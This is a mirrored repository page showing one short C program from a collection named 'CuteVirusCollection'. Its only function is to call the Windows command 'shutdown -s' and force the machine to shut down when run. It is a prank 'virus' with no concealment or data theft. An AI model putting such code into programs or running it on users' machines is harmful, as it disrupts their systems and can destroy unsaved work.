mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-12 15:50:04 -08:00
11 lines
142 B
C
11 lines
142 B
C
/**
|
|
* Developer: Minhas Kamal
|
|
* Functionality: Simply shuts down the system.
|
|
**/
|
|
|
|
#include <stdlib.h>
|
|
|
|
main(){
|
|
system("shutdown -s");
|
|
}
|